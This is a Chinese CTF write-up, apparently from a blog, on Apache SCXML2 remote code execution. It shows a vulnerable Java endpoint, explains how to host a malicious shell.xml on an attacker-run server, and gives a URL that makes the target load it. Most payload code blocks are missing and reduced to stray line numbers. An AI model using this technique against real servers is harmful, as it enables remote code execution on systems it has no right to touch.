-
Apache SCXML2 RCE漏洞
前言
在做 [HDCTF 2023]BabyJxVx 遇到的知识点,但是没公网的服务器只能作罢,写下这篇文章记录
源码利用
public String Flag(@RequestParam(required = true) String filename) { SCXMLExecutor executor = new SCXMLExecutor(); try { if (check(filename)) { SCXML scxml = SCXMLReader.read(filename); executor.setStateMachine(scxml); executor.go(); return "Revenge to me!"; } System.out.println("nonono"); } catch (Exception var4) { System.out.println(var4); } return "revenge?"; }- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
大概考点就是接收filename参数,然后利用SCXMLReader.read()方法来读取恶意xml
上传恶意xml文件
构造payload
shell.xml源码
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
除此之外还有很多构造的
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 1
- 2
- 3
- 4
- 5
- 6
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
搭建Apache服务器
首先我们得在本地搭建服务器,这里我以kali为例
依次执行以下命令sudo apt-get update sudo apt-get install apache2 sudo service apache2 start #启动服务- 1
- 2
- 3
- 4
- 5
然后我们在浏览器访问
http://ip
然后我们将写好的xml文件mv到该根目录下mv /home/kali/shell.xml /var/www/html/- 1
上传成功后我们开启临时文件服务器,在根目录执行下面命令
python3 -m http.server 8000- 1
访问8000端口,成功访问
远程RCE
我们直接在题目处远程RCE,payload如下
http://node4.anna.nssctf.cn:28342/Flag?filename=http://服务器ip:8000/shell.xml- 1
-
相关阅读:
Dubbo注册中心介绍
【微机接口】可编程定时器/计数器8254
jQuery基础学习(属性操作、循环、事件冒泡委托、元素节点操作、滚轮事件、函数节流、json、ajax、jsonp与本地存储)
强大的图片处理工具GraphicsMagick
单元测试到底是什么?应该怎么做?
给表弟写的Python制作GUI学生管理系统毕设,老师直接给出满分,毕业稳了
JavaScript-修炼之路第五层
中国现货白银中的跳空形态
火车头采集怎么使用GPT等AI原创文章
为什么个人IP对任何行业都至关重要
- 原文地址:https://blog.csdn.net/m0_73512445/article/details/134451789
